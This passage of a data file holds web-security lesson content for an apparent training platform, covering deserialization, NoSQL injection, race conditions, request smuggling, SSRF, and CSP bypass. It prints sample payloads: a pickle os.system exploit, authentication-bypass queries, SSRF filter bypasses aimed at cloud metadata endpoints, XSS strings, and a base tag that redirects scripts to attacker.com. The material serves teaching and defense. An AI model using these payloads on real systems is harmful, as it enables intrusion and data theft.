      { heading: "Deserialization attacks", content: `> **What is serialization?** Serialization converts an in-memory object into a byte stream (for storage or transmission); deserialization reconstructs the object. The danger: if the byte stream comes from an attacker, the reconstructed object can have arbitrary properties — and in many languages, the act of deserializing triggers methods automatically. Python's \\\`pickle\\\` calls \\\`__reduce__\\\`, which can execute arbitrary commands. Java deserialization invokes chains of \\\`readObject\\\` methods across library classes ("gadget chains") that end in code execution. PHP calls magic methods like \\\`__wakeup\\\` and \\\`__destruct\\\`.

Insecure deserialization lets attackers manipulate object state:\n\n\`\`\`python\n# Python pickle (NEVER unpickle untrusted data)\nimport pickle, os\nclass Exploit:\n    def __reduce__(self):\n        return (os.system, ('id',))\npayload = pickle.dumps(Exploit())\n\`\`\`\n\n\`\`\`java\n// Java — ysoserial generates payloads for known gadget chains\n// java -jar ysoserial.jar CommonsCollections1 'id' > payload.bin\n\`\`\`\n\nPHP: manipulate serialized objects to change properties, trigger magic methods (__wakeup, __destruct). .NET: BinaryFormatter, TypeNameHandling in JSON.NET.\n\nPrevention: never deserialize untrusted data, use allowlists for deserialized types, prefer JSON over native serialization.`, sortOrder: 1 },
      { heading: "Prototype pollution and NoSQL injection", content: `**Prototype pollution** (JavaScript):\n\`\`\`json\n{\"__proto__\": {\"isAdmin\": true}}\n// If merged into an object without sanitization,\n// Object.prototype.isAdmin becomes true for ALL objects\n\`\`\`\n\n**NoSQL injection** (MongoDB):\n\`\`\`json\n// Authentication bypass\n{\"username\": {\"$ne\": \"\"}, \"password\": {\"$ne\": \"\"}}\n// Matches any non-empty username/password\n\n// Data extraction\n{\"username\": \"admin\", \"password\": {\"$regex\": \"^a\"}}\n// Boolean-based extraction: iterate character by character\n\`\`\`\n\nPrevention: sanitize input against query operators, use mongo-sanitize or equivalent libraries.`, sortOrder: 2 },
      { heading: "Race conditions in web apps", content: `Race conditions occur when concurrent requests exploit time-of-check/time-of-use gaps:\n\n\`\`\`python\n# Send multiple requests simultaneously with Turbo Intruder (Burp extension)\n# Example: apply a discount code multiple times\n# 1. Send 20 parallel requests to /api/apply-discount\n# 2. If the server checks "was discount used?" then applies it,\n#    multiple requests can pass the check before any is committed\n\n# With curl:\nfor i in $(seq 1 20); do\n  curl -s -X POST http://target.com/api/apply-discount \\\\\n    -H "Cookie: session=abc" \\\\\n    -d "code=SAVE50" &\ndone\nwait\n\`\`\`\n\nCommon targets: discount codes, vote systems, balance transfers, rate-limited operations.`, sortOrder: 3 },
      { heading: "Sources", content: `- PortSwigger Research: portswigger.net/research\n- OWASP Deserialization Cheat Sheet\n- PayloadsAllTheThings (SSTI, NoSQL sections)\n- James Kettle, "Smashing the State Machine" (race conditions)`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "web-security",
    depthTier: 4,
    title: "Expert Web Security Techniques",
    recommendedLevel: 4,
    sections: [
      { heading: "HTTP request smuggling", content: `> **Prerequisite: Transfer-Encoding chunked.** HTTP/1.1 has two ways to signal body length: \\\`Content-Length: N\\\` (body is exactly N bytes) and \\\`Transfer-Encoding: chunked\\\` (body is split into chunks, each prefixed with its hex length, terminated by a zero-length chunk \\\`0\\r\\n\\r\\n\\\`). When both headers are present, the spec says Transfer-Encoding wins — but not all servers agree, and that disagreement is the root of smuggling.

Request smuggling exploits disagreements between frontend and backend servers about where one request ends and the next begins:\n\n\`\`\`http\nPOST / HTTP/1.1\nHost: target.com\nContent-Length: 13\nTransfer-Encoding: chunked\n\n0\n\nGET /admin HTTP/1.1\nHost: target.com\n\`\`\`\n\nThe frontend uses Content-Length, the backend uses Transfer-Encoding (or vice versa). The "smuggled" GET /admin request is processed as if it came from the internal network.\n\nVariants: CL.TE, TE.CL, TE.TE (obfuscated Transfer-Encoding), HTTP/2 downgrade smuggling.\n\nImpact: bypass access controls, poison web caches, capture other users' requests.`, sortOrder: 0 },
      { heading: "Advanced SSRF techniques", content: `Beyond basic SSRF:\n\n\`\`\`bash\n# Bypass IP restrictions\nhttp://127.0.0.1 → http://0x7f000001  # hex\nhttp://127.0.0.1 → http://2130706433   # decimal\nhttp://127.0.0.1 → http://0177.0.0.1   # octal\nhttp://127.0.0.1 → http://[::1]        # IPv6\n\n# DNS rebinding: DNS record alternates between\n# attacker IP (passes allowlist) and internal IP (hits target)\n# Tools: rbndr.us, singularity\n\n# SSRF via redirect\n# If allowlisted URL redirects to internal:\n# Attacker server returns: 302 Location: http://169.254.169.254/\n\n# Cloud metadata endpoints:\n# AWS: http://169.254.169.254/latest/meta-data/\n# GCP: http://metadata.google.internal/computeMetadata/v1/\n# Azure: http://169.254.169.254/metadata/instance\n\`\`\``, sortOrder: 1 },
      { heading: "Client-side prototype pollution to XSS", content: `Prototype pollution can escalate to XSS when a library reads from the polluted prototype:\n\n\`\`\`javascript\n// If the app uses a library that does:\n// element.innerHTML = config.template || defaults.template\n// And config inherits from Object.prototype\n\n// Pollution via URL fragment:\n// https://target.com/#__proto__[template]=<img src=x onerror=alert(1)>\n\n// Via JSON merge:\nfetch('/api/settings', {\n  method: 'POST',\n  body: JSON.stringify({\"__proto__\": {\"innerHTML\": \"<img src=x onerror=alert(1)>\"}})\n});\n\`\`\`\n\nGadgets: search for property lookups in popular libraries (jQuery, lodash) that sink to innerHTML, src, or eval.`, sortOrder: 2 },
      { heading: "Sources", content: `- James Kettle, "HTTP Desync Attacks" (PortSwigger Research)\n- Orange Tsai, "A New Era of SSRF"\n- PortSwigger Web Security Academy (all advanced topics)\n- HackerOne Hacktivity (real-world reports)`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "web-security",
    depthTier: 5,
    title: "Web Security Research Topics",
    recommendedLevel: 5,
    sections: [
      { heading: "Browser-based side channels", content: `Side-channel attacks in the browser:\n\n**Timing attacks**: Measure response time to infer server-side state\n\`\`\`javascript\n// XS-Leaks: determine if a user is logged into another site\nconst start = performance.now();\nfetch('https://target.com/api/profile', {mode: 'no-cors'});\nconst duration = performance.now() - start;\n// Authenticated responses may be larger/slower\n\`\`\`\n\n**XS-Leaks**: Cross-site information leakage via browser side channels — frame counting, error events, cache timing, redirect detection. The xsleaks.dev wiki catalogs known techniques.\n\n**Spectre in the browser**: SharedArrayBuffer provides a high-resolution timer for Spectre attacks. Mitigated by Cross-Origin-Opener-Policy and Cross-Origin-Embedder-Policy headers.`, sortOrder: 0 },
      { heading: "Advanced CSP bypass techniques", content: `Bypassing Content Security Policy:\n\n\`\`\`\n# If CSP allows a CDN:\nContent-Security-Policy: script-src 'self' cdn.example.com\n# Find a JSONP endpoint on the CDN:\n<script src=\"https://cdn.example.com/jsonp?callback=alert(1)//\"></script>\n\n# Base tag injection (if base-uri not restricted):\n<base href=\"https://attacker.com/\">\n# All relative script imports now load from attacker.com\n\n# Script gadgets in allowed libraries:\n# Angular: {{constructor.constructor('alert(1)')()\n# jQuery: $.globalEval() if reachable\n\n# DOM clobbering:\n<form id=\"x\"><input name=\"y\" value=\"javascript:alert(1)\"></form>\n# If code does: location = document.getElementById('x').y.value\n\`\`\`\n\nCSP is defense-in-depth, not a silver bullet. Complex allowlists almost always have bypasses.`, sortOrder: 1 },
      { heading: "Supply chain attacks on web applications", content: `Targeting the dependency chain:\n\n- **Typosquatting**: Publish malicious packages with names similar to popular ones (e.g., \`lodahs\` instead of \`lodash\`)\n- **Dependency confusion**: If a company uses private packages, publish a higher-version public package with the same name\n- **Compromised maintainer**: Take over an abandoned but widely-used npm/PyPI package\n- **Build pipeline injection**: Compromise CI/CD to inject malicious code during build\n\nDefense:\n- Lock file integrity (\`package-lock.json\`, \`yarn.lock\`)\n- \`npm audit\` / \`yarn audit\` in CI\n- Use Snyk or Socket.dev for dependency monitoring\n- Pin dependencies by exact version\n- SRI hashes for CDN-loaded scripts`, sortOrder: 2 },
      { heading: "Sources", content: `- xsleaks.dev (XS-Leaks wiki)\n- Sebastian Lekies et al., "Script Gadgets" (bypass CSP via existing code)\n- PortSwigger Research publications\n- OWASP Top 10 CI/CD Security Risks\n- Google Project Zero blog (browser security research)`, sortOrder: 3 },
    ],
  },
];
